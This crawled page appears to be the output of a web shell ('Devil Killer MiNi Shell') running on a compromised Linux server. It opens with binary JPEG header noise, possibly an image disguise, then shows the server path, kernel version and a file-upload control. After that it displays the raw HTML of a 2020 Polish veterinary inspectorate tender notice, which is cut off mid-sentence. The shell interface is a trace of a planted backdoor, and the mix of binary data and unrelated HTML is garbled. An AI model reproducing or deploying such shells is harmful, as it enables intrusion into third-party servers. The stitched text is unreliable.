JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200612/550105-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 550105-N-2020 z dnia 2020-06-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojewódzki Inspektorat Weterynarii</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa testów i odczynników diagnostycznych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojewódzki Inspektorat Weterynarii</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">59728000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Józefa Brodowicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">13</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">30-965</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">122 931 000</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">wiw@wiw.krakow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">122 931 090</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.wiw.krakow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.wiw.krakow.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.wiw.krakow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">z zachowaniem formy pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojewódzki Inspektorat Weterynarii w Krakowie, ul. Brodowicza 13, 30-965 Kraków 69</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa testów i odczynników diagnostycznych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WIW-AG.272.03.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Zamawiający dopuszcza składanie ofert częściowych w podziale na 10 części postępowania. 2. Przedmiotem zamówienia jest dostawa testów i odczynników diagnostycznych obejmująca:	W części 1 zamówienia dostawę antygenów, surowic, koniugatów i komponentów do diagnostyki chorób zwierząt.	W części 2 zamówienia dostawę odczynników do diagnostyki wścieklizny.	W części 3 zamówienia dostawę zestawu odczynników do diagnostyki Niedokrwistości Zakaźnej Koni (NZK).	W części 4 zamówienia dostawę testów do identyfikacji bakterii.	W części 5 zamówienia dostawę testów do identyfikacji drobnoustrojów na będącym w posiadaniu Zamawiającego aparacie VITEK-2 compact 15 prod. BioMerieux.	W części 6 zamówienia dostawę testów do reakcji real-time PCR wraz z akcesoriami kompatybilnymi z posiadanym przez Zamawiającego aparatem Chromo 4.	W części 7 zamówienia dostawę krążków do antybiogramów.	W części 8 zamówienia dostawę odczynników i akcesoriów mających zastosowanie podczas pracy ze szczepami wzorcowymi.	W części 9 zamówienia dostawę szczepów wzorcowych.	W części 10 zamówienia dostawę pozostałych komponentów i szybkich testów do diagnostyki chorób zakaźnych zwierząt. Warunki ogólne dla wszystkich części:1. Transport wszystkich artykułów musi spełniać wymogi przewidziane przez producenta, szczególnie w zakresie wymaganej temperatury przechowywania.2. Podane ilości we wszystkich częściach zamówienia są ilościami maksymalnymi. Zamawiający zastrzega sobie zmniejszenie ilości zamawianych ilości poszczególnych towarów, ale zobowiązuje się do realizacji co najmniej 60% wielkości zamówienia dla danych pozycji4. Jeśli w opisach występują: nazwy znaków towarowych, patentów lub pochodzenia należy to traktować jedynie jako pomoc w opisie przedmiotu zamówienia. W każdym przypadku dopuszczalne są produkty równoważne pod względem, parametrów i przeznaczenia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33694000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>12</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Do oferty każdy wykonawca zobowiązany jest dołączyć: Dokumenty, z których wynika umocowaniedo składania oświadczeń woli w imieniu wykonawcy (przynajmniej do złożenia oferty) – np. odpis zKrajowego Rejestru Sądowego lub CEIDG (o ile dotyczy). Jeżeli wykonawca działa przezpełnomocnika należy dodatkowo załączyć stosowne pełnomocnictwo dla danej osoby. Wypełnione ipodpisane: 1. Formularz ofertowy – załącznik nr 2 do SIWZ; 2. Formularz cenowy oferowanych przez wykonawcę artykułów (zestawienie zaproponowanych artykułów oraz cen jednostkowychposzczególnych elementów dostawy dla każdej pozycji zamówienia) – załącznik nr 3 a, b, c, d doSIWZ – w zakresie części, na które wykonawca składa ofertę. 3. Aktualne na dzień składania ofertoświadczenie w zakresie potwierdzającym: brak podstaw do wykluczenia wykonawcy w zakresieokreślonym w pkt 5.2. SIWZ; 4.Wzór oświadczenia, o którym mowa w pkt 6.1.3. SIWZ doewentualnego wykorzystania stanowi załącznik nr 5 do SIWZ. 5. W przypadku korzystania z zasobówinnego podmiotu na zasadach określonych w pkt 5.3.2.: 5.1. dowód potwierdzający, że Wykonawcabędzie dysponował niezbędnymi zasobami tego podmiotu. Dowody mają precyzować wszczególności: zakres dostępnych wykonawcy zasobów od podmiotu trzeciego, sposób ichwykorzystania, zakres i okres udziału podmiotu udostępniającego zasoby w realizacji zamówienia. 5.2.Wykonawca dodatkowo zobowiązany jest zamieścić informacje o tych podmiotach w oświadczeniuwłasnym wykonawcy, o którym mowa w pkt 6.1.3.. 6. W przypadku wspólnego ubiegania się ozamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 6.1.3. składa każdy zwykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstawwykluczenia w zakresie, w którym każdy z wykonawców wykazuje brak podstaw wykluczenia(dotyczy również wspólników spółki cywilnej). Zamawiający przypomina o obowiązku wynikającymz art. 24 ust. 11 PZP – tj. obowiązku przekazania przez wykonawcę w terminie 3 dni od zamieszczeniana stronie internetowej informacji, o której 